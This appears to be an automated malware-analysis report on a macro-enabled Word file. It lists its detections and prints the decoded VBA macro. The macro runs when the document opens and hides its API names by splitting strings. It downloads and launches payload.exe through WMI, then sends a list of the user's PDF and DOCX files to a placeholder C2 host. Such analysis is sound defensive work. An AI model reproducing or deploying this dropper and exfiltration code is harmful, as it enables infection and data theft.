MALICIOUS
350
Risk Score
Heuristics 9
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments") -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
objStream.Write objXMLHTTP.ResponseBody -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "/" & "/" & "." & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2") -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.microsoft.com/office/2019/extlstReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
- http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3333 bytes |
SHA-256: 5afc07df0404d9b1122ceee265dc07bd2ea461a02b993f40b0674f232b3cd8b7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim objWMIService As Object
Dim objProcess As Object
Dim objFSO As Object
Dim objFolder As Object
Dim objFile As Object
Dim strDocumentsPath As String
Dim strPayloadURL As String
Dim strPayloadPath As String
Dim strC2Server As String
Dim strDataToSend As String
Dim objXMLHTTP As Object
Dim objStream As Object
' Set paths and URLs
strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
strPayloadURL = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "e" & "x" & "a" & "m" & "p" & "l" & "e" & ".c" & "o" & "m" & "/" & "p" & "a" & "y" & "l" & "o" & "a" & "d" & ".e" & "x" & "e"
strPayloadPath = CreateObject("W" & "Script" & ".Shell").ExpandEnvironmentStrings("%A" & "P" & "P" & "D" & "A" & "T" & "A%") & "\" & "p" & "a" & "y" & "l" & "o" & "a" & "d" & ".e" & "x" & "e"
strC2Server = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "e" & "x" & "a" & "m" & "p" & "l" & "e" & ".c" & "o" & "m" & "/" & "c" & "2"
' Download payload
Set objXMLHTTP = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & ".X" & "M" & "L" & "H" & "T" & "T" & "P")
objXMLHTTP.Open "G" & "E" & "T", strPayloadURL, False
objXMLHTTP.Send
If objXMLHTTP.Status = 200 Then
Set objStream = CreateObject("A" & "D" & "O" & "D" & "B" & ".S" & "t" & "r" & "e" & "a" & "m")
objStream.Type = 1 ' adTypeBinary
objStream.Open
objStream.Write objXMLHTTP.ResponseBody
objStream.SaveToFile strPayloadPath, 2 ' adSaveCreateOverWrite
objStream.Close
End If
' Execute payload using WMI
Set objWMIService = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "/" & "/" & "." & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2")
Set objProcess = objWMIService.Get("W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s")
objProcess.Create strPayloadPath, Null, Null, intProcessID
' Discovery: Enumerate .pdf and .docx files in Documents folder
Set objFSO = CreateObject("S" & "c" & "r" & "i" & "p" & "t" & "i" & "n" & "g" & ".F" & "i" & "l" & "e" & "S" & "y" & "s" & "t" & "e" & "m" & "O" & "b" & "j" & "e" & "c" & "t")
Set objFolder = objFSO.GetFolder(strDocumentsPath)
For Each objFile In objFolder.Files
If LCase(Right(objFile.Name, 4)) = ".p" & "d" & "f" Or LCase(Right(objFile.Name, 5)) = ".d" & "o" & "c" & "x" Then
' Collect metadata or contents (example: file name and size)
strDataToSend = strDataToSend & "F" & "i" & "l" & "e" & ": " & objFile.Name & ", " & "S" & "i" & "z" & "e" & ": " & objFile.Size & vbCrLf
End If
Next
' Send collected data to C2 server
Set objXMLHTTP = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & ".X" & "M" & "L" & "H" & "T" & "T" & "P")
objXMLHTTP.Open "P" & "O" & "S" & "T", strC2Server, False
objXMLHTTP.Send strDataToSend
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 12800 bytes |
SHA-256: b6079d2df4cd70db766ec65992cb59c3859f31b26adf5468a6983ec6882f8ffc |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.